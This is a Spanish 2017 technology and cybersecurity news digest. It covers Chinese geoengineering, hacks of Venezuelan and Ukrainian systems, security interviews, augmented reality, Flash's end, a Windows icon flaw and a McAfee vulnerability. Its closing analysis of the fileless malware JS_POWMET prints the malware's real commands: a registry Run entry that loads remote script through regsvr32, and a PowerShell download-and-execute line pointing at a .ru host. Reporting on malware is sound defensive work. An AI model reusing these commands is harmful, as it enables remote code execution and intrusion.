9 de agosto de 2017

CHINA. Líder mundial potencial de la geoingeniería contra el cambio climático

La posición cada vez más destacada de China en los asuntos climáticos convierte al país asiático en un firme candidato para liderar las nuevas iniciativas de geoingeniería gracias a una fuerte inversión pública en el área. La última, tres millones de dólares para investigación
Durante los últimos tres años, China ha ensamblado uno de los mayores programas de investigación en geoingeniería con financiación pública del mundo, lo que indica otra área en la que el gigante asiático adelanta al resto de países en asuntos climáticos.
El programa, financiado por el Ministerio de Ciencia y Tecnología chino con tres millones de dólares (2,5 millones de euros), cuenta con alrededor de 15 miembros del profesorado y 40 estudiantes de tres instituciones académicas diferentes. Los investigadores están evaluando el impacto de recurrir a medios tecnológicos para alterar el clima, además de debatir y tratar aspectos relacionados con la política y la gobernanza. La iniciativa no incluye de manera explícita el desarrollo de la tecnología ni la realización de experimentos al aire libre, al contrario que los nuevos programas de investigación en la Universidad de Harvard (EEUU) y la Universidad de Washington (EEUU).
"No quieren ser vistos como los malos, por lo que hay cierta renuencia a hacer eso entre algunos grupos", explica el expatriado británico, glaciólogo y modelador climático que supervisa el programa, John Moore.
Moore, residente de larga duración en China, ejerce como científico principal en la Escuela de Cambio Global y Ciencia del sistema Tierra de la Universidad Normal de Pekín. La semana pasada, Moore dio a conocer en la prestigiosa Conferencia de Investigación Gordon en Newry (Maine, EEUU) los resultados hasta la fecha del proyecto, el cual también incluye a la Universidad de Zhejiang y la Academia China de Ciencias Sociales. Aunque se trata de un evento off the record -los medios de comunicación no pueden informar sobre su contenido-, Moore habló con MIT Technology Review después de su presentación.
Los efectos colaterales de la geoingeniería
La geoingeniería es un término genérico para una serie de métodos propuestos para contrarrestar los efectos del cambio climático. Entre otros enfoques, los científicos han explorado la posibilidad de rociar partículas en la estratosfera para dispersar la luz del sol, o la idea de hacer las nubes costeras más reflectantes. Es una creencia generalizada que este tipo de métodos podrían compensar el aumento de la temperatura característico del cambio climático, pero existen dudas considerables sobre los efectos secundarios potenciales para el medio ambiente, los peliagudos desafíos políticos que plantea y el debate ético de poner en marcha una tecnología que podría alterar el clima a escala mundial.
Moore dice que sus áreas de investigación actuales incluyen el análisis de los impactos potenciales de la geoingeniería en las capas de hielo polar, el nivel del mar, la agricultura y la salud humana. El científico atmosférico e investigador principal del programa en Zhejiang, Long Cao, es coautor de un artículo académico publicado la semana pasada sobre un "cóctel de ingenierías". El estudio, una colaboración con el destacado climatólogo del Instituto Carnegie Ken Caldeira, explora el potencial de utilizar dos tipos de geoingeniería y así equilibrar los efectos ambientales negativos. Otros trabajos publicados recientemente también han evaluado el efecto de estas técnicas sobre los glaciares regionales, el riego en el desierto y la circulación oceánica .
La geoingeniería en el mundo
En Europa también se han llevado a cabo varios proyectos de investigación en geoingeniería con financiación pública como, entre otros, el Programa Prioritario de la Fundación Alemana de Investigación y el proyecto respaldado por la Unión Europea sobre Implicaciones y riesgos de la ingeniería dirigida a la radiación solar para limitar el cambio climático. En Estados Unidos, el mayor esfuerzo investigador a día de hoy es el nuevo programa de investigación multidisciplinar de Geoingeniería Solar de Harvard. el cual ha recaudado alrededor de 7,5 millones de dólares (unos 6,4 millones de euros). Sin embargo, los fondos vienen en su mayoría de fuentes privadas, incluidos el cofundador de Microsoft Bill Gates y la Fundación Hewlett. Los científicos de Harvard y otras instituciones de Estados Unidos apenas han logrado recaudar fondos significativos de origen público, sobre todo debido a la naturaleza todavía controvertida del tema.
No obstante, y dado que China es cada vez más influyente en los asuntos climáticos, la importancia cada vez mayor de su programa de geoingeniería podría terminar por convertirse en un nuevo estándar internacional, explica el director ejecutivo de la Iniciativa Carnegie sobre la gobernanza de la geoingeniería del clima, Janos Pasztor.
Fuente: MIT Technology Review

VENEZUELA. Ataque cibernético afecta a portales estatales

Unos 40 portales de internet de instituciones estatales de Venezuela fueron afectados el lunes por un ataque cibernético, del cual se responsabilizó un grupo que colgó panfletos en los sitios llamando a una insurrección armada.
El grupo responsable por la ofensiva se identificó como "The Binary Guardians". Uno de los afectados fue el Consejo Nacional Electoral (CNE), en cuya página de internet se invitaba a los uniformados del país a unirse "a las unidades militares y/o policiales declaradas en rebeldía".
Un portavoz del CNE confirmó el hackeo a la página, que fue restablecida pasado el mediodía. Otros portales seguían caídos.
El ataque cibernético ocurrió horas después de que las Fuerzas Armadas del país controlaron una rebelión militar en la ciudad central de Valencia que buscaba "restablecer el orden constitucional" y en rechazo a la instalación de la Asamblea Nacional Constituyente, un cuerpo con poderes especiales que ha sido criticado como una afrenta a la democracia.
"En total han sido unas 40 páginas", dijo uno de los integrantes de The Binary Guardians, contactado por Reuters a través de mensajes directos por Twitter.
"Somos un grupo de personas apasionadas por la informática, y por sobre todo por los valores y derechos humanos. En estos momentos se puede decir sin lugar a dudas que estamos ante una dictadura. Y lucharemos contra ella por todos los medios que podamos", agregó el "hacker". Dijo que el ataque se efectuó con "relativa" facilidad.
El volante colgado en las páginas tenía el encabezado "Operación David", en referencia a la denominación dada por los soldados que irrumpieron en el fuerte militar la madrugada del domingo y que fueron neutralizados con un saldo de dos de los rebeldes muertos, un herido y siete detenidos.
El integrante del grupo que perpetró el hackeo, que se reservó su identidad, dijo: "No estamos vinculados a la Operación David pero la apoyamos 100 por ciento".
El grupo colgó un video del discurso final del personaje interpretado por Charles Chaplin en la película El Gran Dictador de 1940.
La página de la Asamblea Nacional, controlada por la oposición, también fue atacada, entre otras de cuerpos de seguridad del Estado y de las Fuerzas Armadas.
Fuente: Reuters

UCRANIA. El paraíso de los ciberataques

Los ataques informáticos recibidos por Ucrania, muchos de los cuales podrían llevar firma rusa, afectan cada vez más a infraestructuras críticas como la red energética. Software pirata y políticas de ciberseguridad nulas crean el cóctel perfecto para los ciberdelincuentes.
El país no solo sufre las consecuencias de los grandes ataques globales como el reciente ataque NotPetya, sino que también planta cara a algo más preocupante: no una, sino dos veces, el país se ha sumido en la oscuridad debido a los ciberataques dirigidos contra su infraestructura energética.
Cambiar las credenciales de inicio de sesión y las contraseñas no es suficiente
Lo cual parece los precursores de algo mucho más serio: interrupciones potencialmente devastadoras y amenazadoras en las infraestructuras del país, las cuales podrían dejar a miles o millones de personas sin electricidad y otros servicios.
Como explicó Wired recientemente, es probable que algunos de los ataques que sufre Ucrania tengan firma rusa, ya que el país más extenso del mundo podría estar realizando pruebas para perfeccionar las herramientas que utilizaría en una ciberguerra a gran escala.
A partir de la información que se extrae del nuevo informe de Reuters sobre cómo trata Ucrania de responder a estos ataques y reforzar sus defensas cibernéticas, es fácil entender por qué Rusia podría haber decidido apuntar al país como objetivo. Además de las tensiones políticas existentes, el aspecto más revelador es que la infraestructura digital de Ucrania ha sido, para decirlo sin rodeos, un desastre. Tal y como apunta el informe de Reuters:
Cuando el jefe de Microsoft Ucrania cambió de puesto para trabajar con el presidente Petro Poroshenko [en 2014], se encontró con que todo el mundo en la oficina [del presidente] usaba la misma contraseña para iniciar sesión [...] En algunos casos, presionar la barra espaciadora era suficiente para entrar a un ordenador [...] La mayoría de los ordenadores funcionaban con software pirata, e incluso cuando se utilizaban programas con licencia estaban desactualizados y carecían de los parches de seguridad necesarios para mantener los hackers a raya.
El informe de Reuters continúa y explica que, afortunadamente, esta cultura informática ha empezado a mejorar en los últimos tres años: la oficina del presidente ha cambiado sus políticas de seguridad y el gobierno ha actualizado el software (aunque se estima que el 82% de los programas informáticos del país no tienen licencia). Además, el país ha creado su propio equipo de ciberpolicía financiado por Reino Unido. Al mismo tiempo, las agencias gubernamentales ya ponen en práctica simulacros para que los trabajadores sepan cómo enfrentarse a un ataque cuando suceda.
Porque aún suceden. El informe añade que los sistemas del gobierno ucraniano son víctimas de ataques de denegación de servicio distribuido (DDoS) una vez cada dos semanas. Los funcionarios, indica el informe, admiten que aún no se está haciendo lo suficiente para contrarrestar esta amenaza. En otras palabras: aún queda un largo camino por recorrer hasta que los sistemas de Ucrania puedan respirar tranquilos e ignorar las embestidas cibernéticas de las que siguen en el punto de mira.
Fuente: MIT Technology Review

CIBERSEGURIDAD. La empatía con el usuario es el eslabón perdido

Para el director de seguridad de Facebook, Alex Stamos, los profesionales de ciberseguridad tienen una verdadera incapacidad para ponerse en la piel de las personas a las que protegen
Facebook fue sin duda el campo de batalla más importante para la guerra informativa mantenida en el período previo a las elecciones presidenciales de Estados Unidos de 2016. Ahora, el director de seguridad de la red social, Alex Stamos, dice que los profesionales de la ciberseguridad necesitan hacer más para proteger a los internautas frente a actores con mala fe.
Sin embargo, eso requiere algo de lo que con demasiada frecuencia se carece en la industria de la seguridad: empatía. "Tenemos una verdadera incapacidad para ponernos en la piel de las personas a las que tratamos de proteger", exponía Stamos en la pasada conferencia de seguridad Black Hat, celebrada a finales del mes pasado en Las Vegas (EEUU).
Las redes sociales, y sobre todo Facebook con sus más de dos mil millones de usuarios, se han convertido hoy en el foro más importante para el debate público. Por todo el mundo, agentes políticos nacionales y extranjeros han aprovechado el acceso a los votantes que ofrecen plataformas como Facebook y Twitter para difundir propaganda y promover ataques políticos.
Con miles de millones de personas más que se espera se conecten a internet en los próximos años, es responsabilidad de empresas como Facebook prever los problemas que puedan encontrar y proteger a esas personas de cualquier forma de abuso, explicó Stamos. Eso incluye desde el spam o mensajes basuras y el acoso hasta la explotación. "Este tipo de ataques pueden producir daños reales", destacó Stamos en alusión a un área tradicionalmente desatendida por la comunidad de expertos en seguridad.
Por ejemplo, la gran mayoría de las usurpaciones de cuentas de Facebook se deben a la reutilización de contraseñas. El uso de cuentas falsas para compartir y amplificar ataques engañosos fue un aspecto prominente de las "operaciones de información" que la compañía detectó durante la campaña electoral estadounidense. Stamos ayudó a elaborar un informe, publicado en abril, en el que describía cómo socavaban el debate público los "actores maliciosos" a través de cuentas falsas.
Comprender por qué las personas son víctimas de ataques poco sofisticados técnicamente es crucial, afirmó Stamos. Para el responsable de seguridad de Facebook, reducir los casos de abuso en línea implica tener en cuenta también el punto de vista de los funcionarios encargados de hacer cumplir la ley y de los gobiernos, algo que la comunidad de hackers y seguridad tradicionalmente ha encontrado difícil de hacer.
Mientras tanto, futuras elecciones en Estados Unidos y otros países serán tan vulnerables -o más- frente a intentos de manipulación como el que vimos en 2016. Facebook está desarrollando técnicas para ayudar a defenderse contra este tipo de ataques como las herramientas de verificación de hechos, también con el desarrollo de herramientas analíticas que pueden detectar las operaciones de propaganda. Ese trabajo se tradujo en la suspensión de 30.000 cuentas falsas en Francia apenas diez días antes de las disputadas elecciones presidenciales del país. La red social también patrocina el Proyecto Defensa de la Democracia Digital, lanzado recientemente por la Escuela Kennedy de Harvard (EEUU), cuyo objetivo es crear un equipo que involucre a los grandes partidos políticos estadounidenses para erradicar los problemas en cuestiones de ciberseguridad electoral.
Sin embargo, y a medida que se conectan miles de millones de seres humanos más, los adversarios encontrarán nuevas vulnerabilidades. Proteger la democracia contra la propaganda online probablemente será una lucha constante. En general, indicó Stamos, "las cosas [en relación a los peligros para las personas en la red] no están mejorando: las cosas están empeorando".
Fuente: MIT Technology Review

CIBERSEGURIDAD."Futura herramienta de estado en casi todos los países"

El exasesor de ciberseguridad de Obama, Michael Daniel, insiste en la importancia de que los gobiernos empiecen a establecer protocolos de seguridad cibernética y pide a los distintos países crear normas y un lenguaje común para trabajar
El punto de vista de Michael Daniel sobre el caos actual que impera en el mundo de la ciberseguridad es único. Tras acabar un período de cuatro años como asesor cibernético del expresidente de EEUU, Barack Obama, Daniel es ahora presidente de CyberThreat Alliance (CTA), un equipo de compañías de ciberseguridad sin ánimo de lucro que está construyendo una plataforma para compartir información sobre amenazas comunes. MIT Technology Review charló con Daniel en la reciente conferencia sobre seguridad informática Black Hat en Las Vegas (EEUU).
Usted ha presenciado el desafío de la ciberseguridad desde la perspectiva del Gobierno, y ahora lo hace desde el sector privado. ¿Cómo describiría el momento en que nos encontramos ahora mismo?
Ahora, cada vez más países están empezando a incorporar capacidades cibernéticas a sus herramientas gubernamentales. La realidad es que tenemos que reconocer que se va a convertir en una herramienta de Estado en casi todos los países, no sólo para Estados Unidos y otros actores de alto nivel como Rusia, China, Israel y Gran Bretaña. Como resultado de esto, tenemos que empezar a pensar en cómo establecer normas de comportamiento y reglas para que estos cambios no desestabilicen.
Tanto los criminales como los países se están volviendo más sofisticados en sus operaciones cibernéticas. ¿Qué papel puede desempeñar en esto la Cyber Threat Alliance?
En su nivel más amplio, la CTA es una organización de intercambio y análisis de información centrada en el vendedor y en la comunidad de proveedores de ciberseguridad. En realidad, no hay ninguna otra organización que haga este tipo de trabajo. Fundamentalmente, la CTA trata de llevar a cabo dos cosas. En primer lugar, nos preguntamos si podemos cambiar la forma en la que se está compitiendo en la industria de la ciberseguridad, para que esta competencia sea más beneficiosa para todos. En lugar de seguir rivalizando con asuntos como: "mi deficiente base de datos es más grande que su deficiente base de datos", deberíamos compartir esas bases, y la rivalidad debería ser sobre "yo hago cosas mejores con los datos": soy más rápido, me integro mejor con su compañía, o entiendo su modelo de negocio mejor, por ejemplo. Este nivel de competencia es de mayor valor y a todo el mundo le iría mejor.
En segundo lugar, al combinar toda esta información podremos comenzar a trazar formas más eficaces de detener a los malos de la película, y hacerlo a lo largo de todo el proceso que siguen en sus asuntos comerciales. Esto no va sobre un adolescente en su sótano, esa no es la verdadera amenaza. El peligro son las organizaciones que actúan como negocios, y tenemos que empezar a pensar en ello para interrumpir y alterar su modelo de negocio.
Fuente: MIT Technology Review

ESPAÑA. "Los ciberataques para robar datos a empresas no son ciencia ficción"

Ante la pasividad de la industria por asegurar sus sistemas cada vez más conectados, el investigador y director de Ciberseguridad en Tecnalia, Óscar Lage, advierte que los riesgos son cada vez mayores
Todo paraíso tiene su infierno. Al ensueño dibujado por los defensores de la sociedad ultraconectada y el internet de las cosas (IoT, por sus siglas en inglés), le corresponde también un reverso menos onírico dominado por el secuestro de sistemas, el robo de datos, la suplantación de identidad y la destrucción de activos.
Una industria conectada es también una industria más amenazada. Y ahora mismo "hay un montón de sistemas que funcionan muy bien porque se han diseñado así, pero en los que nunca se ha tenido en cuenta la ciberseguridad", afirma el director del área de Ciberseguridad en el centro de investigación Tecnalia, Óscar Lage. Por eso, su trabajo consiste en cerrar brechas y minimizar los riesgos empresariales mediante tecnologías como criptografía, las cadenas de bloques y la inteligencia artificial.
El entorno industrial y energético es el que sufre los verdaderos ataques. Un ranwomware afecta a todo, pero lo que más llama la atención son hospitales y fábricas. Estamos hablando de sistemas industriales que están pensados para trabajar de forma aislada y que, de repente, se conectan bajo el paradigma de la industria 4.0 de explotar datos y hacer mantenimiento predictivo. Y ahora es cuando empiezan los problemas.
¿Cuáles son los ciberataques más comunes?
  • En los primeros meses de este año la mayoría de incidentes proceden de redes zombis, ordenadores que están siendo utilizados para atacar. Los ataques más peligrosos son las denegaciones de servicio distribuidas. Pueden paralizar los servicios de un banco, Amazon, o incluso un DNS que resuelve la dirección web de un montón de empresas, como ya pasó el año pasado. Muchos de estos ordenadores y dispositivos IoT están esclavizados a la espera de lanzar un ataque. Es lo que más se produce, aunque obviamente es menos llamativo que un ransomware que bloquea el ordenador.
¿Y en las empresas? ¿Existe alguna particularidad en los ataques que reciben?
  • En la industria, de forma sigilosa y sin detener el ordenador, lo que se está haciendo es robar información. Nos encontramos con gente que cuando presenta una licitación internacional se encuentra con una empresa, por ejemplo china, que ha comprado los datos y presenta el mismo pliego dos dólares más barato. Esto es imposible si no hay una fuga de información. Cuando lo analizas, resulta que a la empresa le faltan logs [registros del comportamiento de los sistemas y programas], etcétera. No se sabe exactamente qué ha pasado, pero alguien de la competencia ha obtenido esa información. Son contratos de muchos millones y en los que hay gente que paga por obtener esa información mediante ataques dirigidos contra empresas concretas. Y esto está pasando en empresas españolas. No hablamos de ciencia ficción.
¿Quién está detrás de esos ataques? ¿Se puede llegar a saber?
  • En muchos casos ni se sabe, pero hay redes y grupos de hackers que se dedican a ello. Incluso determinados gobiernos pueden estar detrás, pero ahí hilar el hilo es muy complicado. Se encuentran muestras, pero este tipo de ataques son muy sigilosos y tampoco es fácil saber quién ha sido realmente.
  • La llamada industria 4.0 y el IoT plantean la conexión total de cualquier elemento. Pero conectar más dispositivos y máquinas implica también más riesgos, ¿no?
Está claro que interconectarlo todo es un nuevo riesgo.
  • Si dispusiéramos de protocolos industriales seguros, autenticados, con comunicaciones confidenciales y cifradas no tendríamos estos problemas. Pero todos estos datos [de la industria] están hechos para estar aislados y de repente los conectamos y los juntamos con cosas como cámaras IP, que hemos comprado a precio y no sabemos muy bien ni cómo funcionan ni qué seguridad tienen. El fabricante puede pensar: "¿Qué problema hay con que vayan a ver dos imágenes de la fábrica?" Pero a partir de la cámara se puede acceder al resto porque está todo en la misma red.
  • Lo primero es segmentar la red, definir exactamente qué necesidades de conexión tiene cada elemento, y poner medidas de protección a la entrada y salida de cada uno de esos segmentos.
¿Por qué no actúan las empresas desde el principio?
  • El problema suele ser que el proceso de conectar la empresa muchas veces lo lidera el departamento de IT, que se quiere lavar las manos y dice que forma parte del departamento industrial. Entonces, de repente, le cae toda la responsabilidad a alguien de producción o de operaciones. Al mismo tiempo, pasan por allí un montón de empresas ofreciendo las bondades y beneficios de explotar los datos, sensorizar y demás. Es su cometido, pero muchas veces esas empresas tampoco se preocupan por la seguridad. Dan por hecho que alguien lo hará, pero la realidad es que, en ese momento, ahí en medio, nadie se preocupa.
  • Falta sensibilidad. Piensa que cada seis meses se incrementa un 19% el número de máquinas conectadas a internet. Ya no es que estén protegidas o no, es que están conectadas directamente a internet. Es un problema bestial.
Quedaría la opción de los proveedores, que las máquinas sean seguras en origen.
  • Intentamos hablar con los fabricantes para que su nueva generación de aparatos sea segura e incluya las medidas adecuadas. Pero tampoco llegarían al mercado hasta dentro de cinco años. Aparte, son equipamientos que tienen una vida útil de 20 ó 30 años. Hay que trabajar con los fabricantes, pero también con quienes los implantan, los clientes tienen que concienciarse.
  • Sin embargo, siempre estaría el riesgo de conectarse desde fuera. Todo apunta a que los sistemas se controlarán cada vez más desde la nube y en remoto.
  • Lo bueno de una red industrial es que, aunque la gente se conecte desde fuera, suele ser bastante estable y su forma de operar es muy similar y su comportamiento se puede modelizar con inteligencia artificial. Por ejemplo, un patrón muy sencillo que se suele detectar muy rápido: si el cambio de parámetro de una máquina suele producirse dos o tres veces al mes y de repente se realiza tres veces en un mismo día, el algoritmo detecta que algo sucede. Puede que sólo estén revisando la máquina, pero algo pasa. A partir de ahí, el responsable de la infraestructura puede revisar si esto es un problema o no. Y si no lo es, el algoritmo lo aprende y lo etiqueta como "mantenimiento".
  • Es en lo que trabajamos mientras llegan la ciberseguridad y los equipos ciberseguros a la industria. No vas a proteger los protocolos, pero por lo menos detectar lo que está pasando hasta entonces. Si hablamos de una nueva planta, quizá en seis años ya esté totalmente segura, pero nos quedan muchos años de máquinas e industrias no seguras.
La inteligencia artificial se convierte un poco en vigilante, pero ¿podría ser también una amenaza?
  • Los atacantes también son cada vez más fuertes y utilizan este tipo de inteligencia artificial para dar el salto. Un ejemplo es el uso de agentes inteligentes que simulan el comportamiento de una red para no levantar sospechas. Son cosas súper complicadas y cada vez más difíciles de detectar.
Fuente: MIT Technology Review

La precisión de la realidad aumentada en la ciudad es más visión por ordenador que GPS

Un nuevo sistema de posicionamiento de imágenes virtuales sobre entornos físicos gracias a la visión por ordenador permite mejorar las posición de los elementos de realidad aumentada actuales sobre la ciudad física
Si alguna vez ha jugado en su teléfono inteligente con una aplicación de realidad aumentada como Pokémon Go, sabe que puede ser divertido, pero también sabe que las imágenes virtuales que se ven a través de la pantalla a menudo no parecen tan buenas cuando se las compara con el paisaje real que hay detrás.
Parte del problema es que las aplicaciones de realidad aumentada suelen depender de una combinación del GPS y la brújula del teléfono móvil para saber dónde se encuentra el dispositivo y, por tanto, saber dónde mostrar esas imágenes en la pantalla. Sin embargo, la realidad es que el GPS no funciona tan bien como debería en lugares como una ciudad abarrotada. Esto provoca fallos, como objetos virtuales que aparecen temblorosos y fuera de lugar en vez encajar perfectamente con el entorno.
Una start up de realidad aumentada llamada Blippar trabaja en un método diferente que, según sus creadores, puede conducir a aplicaciones de realidad aumentada mucho más atractivas y fidedignas que las actuales. La start up utiliza la visión por ordenador o visión artificial para ayudar a identificar dónde se encuentra el móvil y hacia qué dirección apunta en relación al espacio que lo rodea. Según los desarrolladores del sistema, lo hace de una forma mucho más precisa que los GPS convencionales, sobre todo en entornos urbanos.
El cofundador de Blippar y director de tecnología, Omar Tayeb, asegura que la empresa está emprendiendo este proyecto gracias al permiso para poder usar un auténtico tesoro con datos de imágenes de las principales ciudades del mundo. Se trata en esencia de la versión de otra empresa (no desvelan cuál) de Google Street View. El equipo de Blippar indexa las imágenes y luego las compara con lo que un usuario de un teléfono inteligente ve a través de la cámara del dispositivo para encontrar la coincidencia más cercana a su ubicación. El teléfono también puede usar la triangulación GPS o la triangulación entre la celda y la torre de la red de telefonía móvil para determinar dónde se encuentra (Blippar, según su creador, no es capaz de eso). De momento, la empresa lo ha probado en San Francisco (EEUU), Londres (Reino Unido) y Mountain View (California, EEUU).
Con los datos e imágenes con los cuentan, explica Tayeb, Blippar tiene la capacidad de obtener imágenes de edificios desde diferentes ángulos, lo que ayuda a determinar la distancia a la que están unos de otros y desde qué punto se están mirando. Esta función también determina con mayor precisión dónde debe aparecer una señal virtual u otra imagen.
¿Cómo se vería? Puede hacerse una idea con este vídeo rodado por un iPhone con un prototipo de la de app de Blippar usado de forma interna por la compañía.
Los gráficos en el vídeo parecen ásperos: los ciclistas recorren bandas de color superpuestas en la calle, y una pizarra como las que suelen poner los bares en la calle flota extrañamente por enciam del suelo.
Pero las imágenes aparecen con rapidez y su posición en la imagen parece tener sentido. Tayeb asegura que el método de Blippar para estimar la localización de un objeto tiene un margen de error de unos ocho metros, aunque, explica, en la mayoría de casos baja a menos de tres metros. Normalmente, el GPS de un teléfono móvil es exacto con un margen de error de cinco metros si se está en un área abierta; un dato que empeora cuando se calcula la posición en un lugar con un montón de edificios, árboles, y demás.
Tayeb dice que Blippar planea lanzar aplicaciones para Android y iPhone que serán anunciadas en los próximos tres meses. Esto, espera, demostrará cómo su técnica de posicionamiento podría funcionar con diferente tipo de contenido como listados de propiedades inmobiliarias y reseñas de restaurantes superpuestas sobre el mundo real. Eventualmente, el cofundador también espera que otras compañías adquieran la licencia de esta tecnología para desarrollar sus propias aplicaciones.
Fuente: MIT Technology Review

¿NAVEGADORES INSEGUROS?. Los tiempos cambian que es una barbaridad.

Hace unos días llegó la noticia de la propia Adobe: Flash se acaba en 2020. Fin de la cita y fin de una era.
Aunque en su nota de prensa no mencionan ni de pasada las 1033 vulnerabilidades de seguridad (casi todas de máxima gravedad) que salen en una búsqueda rápida, Adobe alega únicamente un cambio de rumbo en la tecnología hacia estándares más abiertos, tales como HTML5 y WebGL.
Lo de Flash era una muerte anunciada. No podía ser de otro modo. Arrinconado por las vulnerabilidades, autentica puerta de entrada de toda clase de malware, y denostado por los buscadores, Flash fue reduciendo su masa de usuarios, desarrolladores y navegadores que lo soportan. Es incontable la cantidad de exploits que usan Flash como vector de explotación (junto con Adobe PDF Reader o Java, el tridente de la inseguridad). Es tal el ritmo de aparición de CVE sobre Flash que hasta dejaron de ser noticia.
Aunque Adobe fija su fin en 2020, todavía nos quedarán los rescoldos de una larga batalla por la expulsión de Flash del campo de juego del navegador. Engaños a usuarios desprevenidos (“pinche aquí amigo, instálese la última versión de Flash”, “Ah, ¿pero no había desaparecido?”, “pinche aquí amigo”, “vale, vale, pincho”) o navegadores sin actualizar. Sorprende que incluso con la política de actualizaciones automáticas todavía hay usuarios que no reinician el navegador para aplicarlas. Eso nos deja una pequeña rendija abierta en la ventana de exposición.
Flash no se queda solo. Los lectores de PDF incrustados en el navegador van siendo desplazados por el propio lector hecho en Javascript (no es broma, hecho en puro Javascript). Esto permite cerrar la vía a esos auténticos monstruos salidos de la mente de un escritor pasado de absenta que son los complementos nativos, auténticos quebraderos de cabeza de la navegación segura.
Otro que va borrando su mala impronta es Java. Hace tiempo que fue noticia su práctico baneo por los principales navegadores, y su uso generalista se ve marginado a ciertas aplicaciones obsoletas y sin mantenimiento, por ejemplo, algunas webs gubernamentales en las que te exigen “INTERNET EXPLORER 5.5 o superior / Java RunTime Environment Sun Versión 1.4.2. o superior” (la cita es textual, de la página de un Ministerio). Quién ha instalado una máquina virtual con un Windows 2000 y Java 1.4 obsoletos para firmar digitalmente sabe de qué se está hablando. Ahora esa misma firma electrónica se efectúa en, sorpresa, Javascript.
Más información:
Fuente: Hispsaec

OJO AL DATO. No fiarse de un fichero solo por su icono

Un fallo detectado a la hora de procesar determinado tipo de iconos en Windows permitiría simular documentos benignos para albergar malware y engañar al usuario.
Un reciente estudio de la firma de seguridad Cybereason ha revelado un fallo a la hora de procesar determinados formatos de icono que, usado junto a un problema con la caché de iconos de Windows, permitiría a cualquier PE (Portable Ejectutable) modificar la representación de su icono de programa para simular un documento benigno o cualquier otro icono de sistema.
La técnica parece haber sido utilizado por variantes del ransomware “Cerber” entre otros, y técnicamente se basa en un fallo de los sistemas Windows a la hora de manejar iconos en formato “True Monochrome”. En vez de cargar el icono original presente dentro del ejecutable, el sistema carga un representación totalmente diferente basándose en la caché de Iconos de Windows, como se puede ver en el vídeo ilustrativo:
El fallo reportado a Microsoft, estaría presente en la clase 'CImageList' de la librería comctl32.dll afectando a todas las versiones de Windows desde la 7 hasta la presente Windows 10.
Como medida general de protección, recordamos activar siempre la opción de mostrar la extensión de fichero en el explorador de Windows.
Más información:
Fuente: Hispasec

Ejecución remota de comandos en McAfee Security Scan Plus

Una vulnerabilidad en McAfee Security Scan Plus podría permitir la ejecución de cualquier ejecutable residente con los privilegios del usuario del sistema.
McAfee Security Scan Plus es una herramienta de diagnóstico gratuita que permite comprobar el estado de la protección del equipo, determinando si existen soluciones antivirus, cortafuegos y seguridad Web instaladas,
McAfee Security Scan Plus obtiene información promocional procedente de diferentes dominios ‘mcafee.com’ y la muestra en la interfaz de usuario, normalmente en la ventana principal de la aplicación.
La vulnerabilidad, a la que se le ha asignado el identificador CVE-2017-3897, está causada por los siguientes factores:
La información se obtiene a través de HTTP en texto plano, por lo que podría ser modificada por un atacante remoto.
La aplicación McAfee Security Scan Plus confía en la librería ‘MCBRWSR2.DLL’ para mostrar contenido HTML. Esta librería expone la función javascript ‘LaunchApplication()’ que permite ejecutar comandos arbitrarios en el sistema. El siguiente ejemplo ejecutaría la calculadora de Windows (‘calc.exe’):
Después de cada análisis del sistema, McAfee Security Scan Plus descarga un elemento que indica el nivel de protección. Aunque la respuesta original redirecciona a una URL HTTPs segura y los certificados de servidor son verificados por el cliente, sería posible a través de un ataque Man-in-the-Middle reemplazar este mensaje con una respuesta que contenga una llamada a la función ‘LaunchApplication()’. Esto permitiría ejecutar comandos con los permisos del usuario actual. Esta solicitud se realiza en cada análisis: tanto si es iniciado iniciado por el usuario
McAfee Security Scan Plus puede ser descargado gratuitamente desde la página oficial de McAfee, pero también se distribuye junto a software de terceros, como una opción adicional -marcada por defecto- durante el proceso de instalación de dichos programas. Un ejemplo de esto es el plugin de Adobe Flash Player para los navegadores web (https://get.adobe.com/es/flashplayer/).
Esto significa que podrían existir equipos que cuenten con McAfee Security Scan Plus instalado sin que el usuario tenga conocimiento de ello (la instación está activada por defecto), lo que supondría un mayor riesgo para estos sistemas si no se actualizan para corregir el fallo de seguridad.
En el sitio oficial se encuentra disponible para su descarga la versión de McAfee Security Scan Plus 3.11.587.1 que corrige esta vulnerabilidad.
Más información:
Fuente: Hispasec

JS_POWMET: Malware sin malware

El pasado 24 de julio el equipo de Trend Micro anunciaba la detección de JS_POWMET, un malware completamente "fileless" que realiza toda su actividad desde la memoria, sin escribir ni dejar rastro en el disco duro de la víctima.
¿QUÉ ES EL MALWARE "FILELESS"?
Fileless malware, o malware sin ficheros, es un tipo de malware que se instala y se ejecuta en memoria. No necesita escribir ningún dato en el disco duro de la víctima para ejecutar su payload, lo que dificulta enormemente su detección.
Este tipo de familias se conocen como "Advanced Volatile Threats (AVT)" y suelen estar orientadas al robo de información valiosa y propiedad intelectual de empresas, bancos y gobiernos.
Antecedentes
Este concepto de malware "sin ficheros" no es nuevo. De hecho el primer "fileless malware" data de 1987: conocido como Lehigh, infectaba el fichero COMMAND.COM y se instalaba en la memoria. Desde allí buscaba otros ficheros COMMAND.COM y los infectaba. Cuando había realizado cuatro infecciones sobreescribía el sector de arranque y la tabla de asignación de archivos.
La mayoría de esta clase de virus terminan realizando algún tipo de escritura en disco cuando ejecutan su payload. Son sólo "fileless" durante la fase de infección.
JS_POWMET sin embargo no realiza ninguna escritura durante su ciclo de vida, lo que lo hace particularmente interesante.
Cómo funciona JS_POWMET
El virus llega al sistema a través de un malware intermedio que añade una entrada al registro de arranque de Windows:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{URL al XML malicioso} scrobj.dll”
Este comando ejecutará cada vez que se inicie la máquina un Javascript malicioso contenido en un XML remoto, sin necesidad de guardarlo en el disco duro.
Una vez ejecutado, JS_POWMET descargará el fichero "TROJ_PSINJECT", un script para Powershell que descargará y desencriptará otro fichero: "favicon" desde la URL https://bogerando.ru/favicon.
%System%\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('https://{BLOCKED}ndo.ru/p1'));
Una vez descifrado, el fichero "favicon" se inyectará por medio de "ReflectivePELoader" en el proceso "TROJ_PSINJECT", todo esto sin guardar ningún fichero al disco duro.
A continuación el malware volverá a descifrar el fichero "favicon" utilizando una clave RC4 hardcodeada en el código del virus. Esto da lugar a una nueva DLL maliciosa, "BKDR_ANDROM" que se inyectará en el proceso que ejecuta Powershell.
